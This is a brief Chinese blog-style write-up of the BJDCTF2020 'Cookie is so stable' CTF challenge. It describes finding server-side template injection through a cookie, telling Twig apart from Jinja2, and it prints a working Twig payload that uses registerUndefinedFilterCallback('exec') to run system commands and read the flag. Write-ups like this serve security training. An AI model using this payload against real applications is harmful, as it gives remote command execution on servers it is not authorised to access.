title: BJDCTF2020Cookie is so stable.md
date: 2022-07-07 18:45:14
tags:
进去之后发现这个
好像ssti
我们输入{{1+2}}
返回这个应该时ssti了
然后我们输入
{{"".__class__}}
发现
应该是做了一些过滤 我们抓包看看吧
这里提示也说用cookie来
猜测它应该是也可以用cookie来辨别身份 然后呈现给用户
这里 可以看出来
发现ssti成功
输入 {{7*'7'}},返回 49 表示是 Twig 模块化
输入 { {7*'7'}},返回 7777777 表示是 Jinja2 模块化
这个是twig模块化
输入固定payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
发现执行成功直接cat flag
